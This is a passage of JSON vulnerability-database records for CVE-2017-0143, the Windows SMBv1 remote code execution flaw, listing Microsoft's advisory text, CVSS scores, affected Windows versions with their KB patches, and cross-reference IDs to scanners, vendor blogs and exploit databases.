"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T16:51:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T16:51:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3205409", "KB3213986", "KB4013429", "KB4012213", "KB4012606", "KB4012215", "KBMS16-110, 3187754", "KB4012216", "KB4012212", "KB3210720", "KB3212646", "KB4012214", "KB3177186", "KB3210721", "KB4012217", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:51:19", "differentElements": ["msAffectedSoftware"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T06:46:35", "history": [], "viewCount": 9, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", 
"KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T06:46:35", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T06:46:35", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012215", "KB3210720", "KB3213986", "KB3205409", "KB3205401", "KB4012214", "KB3212646", "KBMS16-110, 3187754", "KB4013429", "KB4013198", "KB4012216", "KB4012213", "KB4012598", "KB4012212", "KB4012606", "KB4012217", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 
"Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": 
"KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": 
""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:46:35", "differentElements": ["msAffectedSoftware"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T08:49:10", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T08:49:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB4012212", "KB3213986", "KB3210720", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3205409", "KB3212646", "KB3210721", "KB4012214", "KB3177186", "KB4012215", "KB4012213", "KB4012216", "KB4013198", "KB4013429", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 
R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": 